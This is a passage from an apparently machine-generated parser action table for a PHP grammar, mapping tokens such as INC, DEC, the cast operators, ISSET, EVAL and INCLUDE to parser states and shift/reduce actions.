832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,49,-3,-2,-4,-5,-6,49,-50,-443,49,49,49,49,49,-47,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,-443,49,49,-23,49,-48,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,-38,-40,-42,-443,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,-8,-443,49,-30,-22,-24,-25,-26,49,-11,-12,49,49,-39,-41,-43,-44,49,-45,-46,49,49,-56,49,49,49,49,49,49,49,49,-7,49,-9,49,49,-28,49,49,49,49,49,49,49,-443,49,49,49,49,49,49,49,-10,-29,-443,-443,49,49,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,49,49,49,-27,-443,-62,49,49,49,-51,-55,49,-110,49,49,-31,-64,49,-34,49,-85,49,-443,-443,-443,-109,49,-65,-71,49,-36,-83,-443,-443,-92,-93,-86,-87,49,-61,49,49,49,-443,-35,-76,-443,49,-443,49,-88,-54,-108,49,-32,49,49,49,-63,-84,-443,-443,-77,49,-443,49,-52,49,]),'INC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,39,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,73,84,85,100,101,104,106,107,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,269,270,271,275,276,277,285,286,287,288,289,291,292,295,301,302,303,304,305,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,418,423,425,428,429,431,432,437,441,442,443,444,445,446,449,477,479,480,481,482,485,487,488,489,490,500,501,525,528,532,549,556,557,559,560,562,563,564,565,566,570,613,614,616,617,618,620,621,622,630,634,636,637,638,639,640,657,679,682,685,686,693,695,698,701,702,703,740,741,742,743,746,748,759,762,763,776,798,801,802,803,804,805,806,811,813,814,817,818,820,822,825,826,832,835,836,841,856,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,900,902,903,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,50,-3,-2,-4,-5,-6,50,-50,-443,50,50,50,50,50,-47,50,203,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,-206,-207,-208,-225,-226,-228,-237,-239,-443,50,50,-23,50,-48,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,-38,-40,-42,-443,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,-227,50,-228,-8,-443,50,-30,-22,-24,-25,-26,50,-11,-12,-443,-244,-248,50,-250,50,-39,-41,-43,-44,50,-45,-46,50,50,-56,50,50,50,50,-443,50,50,-229,50,-230,50,-219,-7,50,-9,50,-209,50,-28,50,50,-221,-243,-245,50,50,50,50,50,-443,50,-234,50,50,-443,50,50,50,50,-218,-235,-236,-240,-10,-29,-443,-443,50,50,-249,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,50,50,-205,-223,50,-210,-231,-232,-211,-27,-443,-62,50,-220,50,50,-51,-55,50,-110,-222,-212,-213,50,-214,-215,50,-31,-64,50,-246,-247,-34,50,-85,50,-443,-443,-443,-109,-443,50,-65,-71,50,-36,-83,-443,-443,-92,-93,-86,-87,50,-61,50,50,-224,-216,-217,50,-443,-35,-76,-443,50,-443,50,-88,-54,-108,50,-32,50,50,50,-63,-84,-443,-443,-77,50,-443,50,-52,50,]),'DEC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,39,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,73,84,85,100,101,104,106,107,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,269,270,271,275,276,277,285,286,287,288,289,291,292,295,301,302,303,304,305,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,418,423,425,428,429,431,432,437,441,442,443,444,445,446,449,477,479,480,481,482,485,487,488,489,490,500,501,525,528,532,549,556,557,559,560,562,563,564,565,566,570,613,614,616,617,618,620,621,622,630,634,636,637,638,639,640,657,679,682,685,686,693,695,698,701,702,703,740,741,742,743,746,748,759,762,763,776,798,801,802,803,804,805,806,811,813,814,817,818,820,822,825,826,832,835,836,841,856,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,900,902,903,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,51,-3,-2,-4,-5,-6,51,-50,-443,51,51,51,51,51,-47,51,204,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,-206,-207,-208,-225,-226,-228,-237,-239,-443,51,51,-23,51,-48,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,-38,-40,-42,-443,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,-227,51,-228,-8,-443,51,-30,-22,-24,-25,-26,51,-11,-12,-443,-244,-248,51,-250,51,-39,-41,-43,-44,51,-45,-46,51,51,-56,51,51,51,51,-443,51,51,-229,51,-230,51,-219,-7,51,-9,51,-209,51,-28,51,51,-221,-243,-245,51,51,51,51,51,-443,51,-234,51,51,-443,51,51,51,51,-218,-235,-236,-240,-10,-29,-443,-443,51,51,-249,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,51,51,-205,-223,51,-210,-231,-232,-211,-27,-443,-62,51,-220,51,51,-51,-55,51,-110,-222,-212,-213,51,-214,-215,51,-31,-64,51,-246,-247,-34,51,-85,51,-443,-443,-443,-109,-443,51,-65,-71,51,-36,-83,-443,-443,-92,-93,-86,-87,51,-61,51,51,-224,-216,-217,51,-443,-35,-76,-443,51,-443,51,-88,-54,-108,51,-32,51,51,51,-63,-84,-443,-443,-77,51,-443,51,-52,51,]),'INT_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,52,-3,-2,-4,-5,-6,52,-50,-443,52,52,52,52,52,-47,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,-443,52,52,-23,52,-48,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,-38,-40,-42,-443,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,-8,-443,52,-30,-22,-24,-25,-26,52,-11,-12,52,52,-39,-41,-43,-44,52,-45,-46,52,52,-56,52,52,52,52,52,52,52,52,-7,52,-9,52,52,-28,52,52,52,52,52,52,52,-443,52,52,52,52,52,52,52,-10,-29,-443,-443,52,52,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,52,52,52,-27,-443,-62,52,52,52,-51,-55,52,-110,52,52,-31,-64,52,-34,52,-85,52,-443,-443,-443,-109,52,-65,-71,52,-36,-83,-443,-443,-92,-93,-86,-87,52,-61,52,52,52,-443,-35,-76,-443,52,-443,52,-88,-54,-108,52,-32,52,52,52,-63,-84,-443,-443,-77,52,-443,52,-52,52,]),'DOUBLE_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,53,-3,-2,-4,-5,-6,53,-50,-443,53,53,53,53,53,-47,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,-443,53,53,-23,53,-48,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,-38,-40,-42,-443,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,-8,-443,53,-30,-22,-24,-25,-26,53,-11,-12,53,53,-39,-41,-43,-44,53,-45,-46,53,53,-56,53,53,53,53,53,53,53,53,-7,53,-9,53,53,-28,53,53,53,53,53,53,53,-443,53,53,53,53,53,53,53,-10,-29,-443,-443,53,53,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,53,53,53,-27,-443,-62,53,53,53,-51,-55,53,-110,53,53,-31,-64,53,-34,53,-85,53,-443,-443,-443,-109,53,-65,-71,53,-36,-83,-443,-443,-92,-93,-86,-87,53,-61,53,53,53,-443,-35,-76,-443,53,-443,53,-88,-54,-108,53,-32,53,53,53,-63,-84,-443,-443,-77,53,-443,53,-52,53,]),'STRING_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,54,-3,-2,-4,-5,-6,54,-50,-443,54,54,54,54,54,-47,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,-443,54,54,-23,54,-48,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,-38,-40,-42,-443,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,-8,-443,54,-30,-22,-24,-25,-26,54,-11,-12,54,54,-39,-41,-43,-44,54,-45,-46,54,54,-56,54,54,54,54,54,54,54,54,-7,54,-9,54,54,-28,54,54,54,54,54,54,54,-443,54,54,54,54,54,54,54,-10,-29,-443,-443,54,54,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,54,54,54,-27,-443,-62,54,54,54,-51,-55,54,-110,54,54,-31,-64,54,-34,54,-85,54,-443,-443,-443,-109,54,-65,-71,54,-36,-83,-443,-443,-92,-93,-86,-87,54,-61,54,54,54,-443,-35,-76,-443,54,-443,54,-88,-54,-108,54,-32,54,54,54,-63,-84,-443,-443,-77,54,-443,54,-52,54,]),'ARRAY_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,55,-3,-2,-4,-5,-6,55,-50,-443,55,55,55,55,55,-47,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,-443,55,55,-23,55,-48,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,-38,-40,-42,-443,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,-8,-443,55,-30,-22,-24,-25,-26,55,-11,-12,55,55,-39,-41,-43,-44,55,-45,-46,55,55,-56,55,55,55,55,55,55,55,55,-7,55,-9,55,55,-28,55,55,55,55,55,55,55,-443,55,55,55,55,55,55,55,-10,-29,-443,-443,55,55,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,55,55,55,-27,-443,-62,55,55,55,-51,-55,55,-110,55,55,-31,-64,55,-34,55,-85,55,-443,-443,-443,-109,55,-65,-71,55,-36,-83,-443,-443,-92,-93,-86,-87,55,-61,55,55,55,-443,-35,-76,-443,55,-443,55,-88,-54,-108,55,-32,55,55,55,-63,-84,-443,-443,-77,55,-443,55,-52,55,]),'OBJECT_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,56,-3,-2,-4,-5,-6,56,-50,-443,56,56,56,56,56,-47,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,-443,56,56,-23,56,-48,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,-38,-40,-42,-443,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,-8,-443,56,-30,-22,-24,-25,-26,56,-11,-12,56,56,-39,-41,-43,-44,56,-45,-46,56,56,-56,56,56,56,56,56,56,56,56,-7,56,-9,56,56,-28,56,56,56,56,56,56,56,-443,56,56,56,56,56,56,56,-10,-29,-443,-443,56,56,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,56,56,56,-27,-443,-62,56,56,56,-51,-55,56,-110,56,56,-31,-64,56,-34,56,-85,56,-443,-443,-443,-109,56,-65,-71,56,-36,-83,-443,-443,-92,-93,-86,-87,56,-61,56,56,56,-443,-35,-76,-443,56,-443,56,-88,-54,-108,56,-32,56,56,56,-63,-84,-443,-443,-77,56,-443,56,-52,56,]),'BOOL_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,57,-3,-2,-4,-5,-6,57,-50,-443,57,57,57,57,57,-47,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,-443,57,57,-23,57,-48,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,-38,-40,-42,-443,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,-8,-443,57,-30,-22,-24,-25,-26,57,-11,-12,57,57,-39,-41,-43,-44,57,-45,-46,57,57,-56,57,57,57,57,57,57,57,57,-7,57,-9,57,57,-28,57,57,57,57,57,57,57,-443,57,57,57,57,57,57,57,-10,-29,-443,-443,57,57,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,57,57,57,-27,-443,-62,57,57,57,-51,-55,57,-110,57,57,-31,-64,57,-34,57,-85,57,-443,-443,-443,-109,57,-65,-71,57,-36,-83,-443,-443,-92,-93,-86,-87,57,-61,57,57,57,-443,-35,-76,-443,57,-443,57,-88,-54,-108,57,-32,57,57,57,-63,-84,-443,-443,-77,57,-443,57,-52,57,]),'UNSET_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,58,-3,-2,-4,-5,-6,58,-50,-443,58,58,58,58,58,-47,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,-443,58,58,-23,58,-48,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,-38,-40,-42,-443,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,-8,-443,58,-30,-22,-24,-25,-26,58,-11,-12,58,58,-39,-41,-43,-44,58,-45,-46,58,58,-56,58,58,58,58,58,58,58,58,-7,58,-9,58,58,-28,58,58,58,58,58,58,58,-443,58,58,58,58,58,58,58,-10,-29,-443,-443,58,58,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,58,58,58,-27,-443,-62,58,58,58,-51,-55,58,-110,58,58,-31,-64,58,-34,58,-85,58,-443,-443,-443,-109,58,-65,-71,58,-36,-83,-443,-443,-92,-93,-86,-87,58,-61,58,58,58,-443,-35,-76,-443,58,-443,58,-88,-54,-108,58,-32,58,58,58,-63,-84,-443,-443,-77,58,-443,58,-52,58,]),'BINARY_CAST':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,59,-3,-2,-4,-5,-6,59,-50,-443,59,59,59,59,59,-47,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,-443,59,59,-23,59,-48,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,-38,-40,-42,-443,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,-8,-443,59,-30,-22,-24,-25,-26,59,-11,-12,59,59,-39,-41,-43,-44,59,-45,-46,59,59,-56,59,59,59,59,59,59,59,59,-7,59,-9,59,59,-28,59,59,59,59,59,59,59,-443,59,59,59,59,59,59,59,-10,-29,-443,-443,59,59,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,59,59,59,-27,-443,-62,59,59,59,-51,-55,59,-110,59,59,-31,-64,59,-34,59,-85,59,-443,-443,-443,-109,59,-65,-71,59,-36,-83,-443,-443,-92,-93,-86,-87,59,-61,59,59,59,-443,-35,-76,-443,59,-443,59,-88,-54,-108,59,-32,59,59,59,-63,-84,-443,-443,-77,59,-443,59,-52,59,]),'ISSET':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,60,-3,-2,-4,-5,-6,60,-50,-443,60,60,60,60,60,-47,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,-443,60,60,-23,60,-48,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,-38,-40,-42,-443,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,-8,-443,60,-30,-22,-24,-25,-26,60,-11,-12,60,60,-39,-41,-43,-44,60,-45,-46,60,60,-56,60,60,60,60,60,60,60,60,-7,60,-9,60,60,-28,60,60,60,60,60,60,60,-443,60,60,60,60,60,60,60,-10,-29,-443,-443,60,60,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,60,60,60,-27,-443,-62,60,60,60,-51,-55,60,-110,60,60,-31,-64,60,-34,60,-85,60,-443,-443,-443,-109,60,-65,-71,60,-36,-83,-443,-443,-92,-93,-86,-87,60,-61,60,60,60,-443,-35,-76,-443,60,-443,60,-88,-54,-108,60,-32,60,60,60,-63,-84,-443,-443,-77,60,-443,60,-52,60,]),'EMPTY':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,61,-3,-2,-4,-5,-6,61,-50,-443,61,61,61,61,61,-47,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,-443,61,61,-23,61,-48,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,-38,-40,-42,-443,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,-8,-443,61,-30,-22,-24,-25,-26,61,-11,-12,61,61,-39,-41,-43,-44,61,-45,-46,61,61,-56,61,61,61,61,61,61,61,61,-7,61,-9,61,61,-28,61,61,61,61,61,61,61,-443,61,61,61,61,61,61,61,-10,-29,-443,-443,61,61,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,61,61,61,-27,-443,-62,61,61,61,-51,-55,61,-110,61,61,-31,-64,61,-34,61,-85,61,-443,-443,-443,-109,61,-65,-71,61,-36,-83,-443,-443,-92,-93,-86,-87,61,-61,61,61,61,-443,-35,-76,-443,61,-443,61,-88,-54,-108,61,-32,61,61,61,-63,-84,-443,-443,-77,61,-443,61,-52,61,]),'EVAL':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,62,-3,-2,-4,-5,-6,62,-50,-443,62,62,62,62,62,-47,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,-443,62,62,-23,62,-48,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,-38,-40,-42,-443,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,-8,-443,62,-30,-22,-24,-25,-26,62,-11,-12,62,62,-39,-41,-43,-44,62,-45,-46,62,62,-56,62,62,62,62,62,62,62,62,-7,62,-9,62,62,-28,62,62,62,62,62,62,62,-443,62,62,62,62,62,62,62,-10,-29,-443,-443,62,62,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,62,62,62,-27,-443,-62,62,62,62,-51,-55,62,-110,62,62,-31,-64,62,-34,62,-85,62,-443,-443,-443,-109,62,-65,-71,62,-36,-83,-443,-443,-92,-93,-86,-87,62,-61,62,62,62,-443,-35,-76,-443,62,-443,62,-88,-54,-108,62,-32,62,62,62,-63,-84,-443,-443,-77,62,-443,62,-52,62,]),'INCLUDE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,28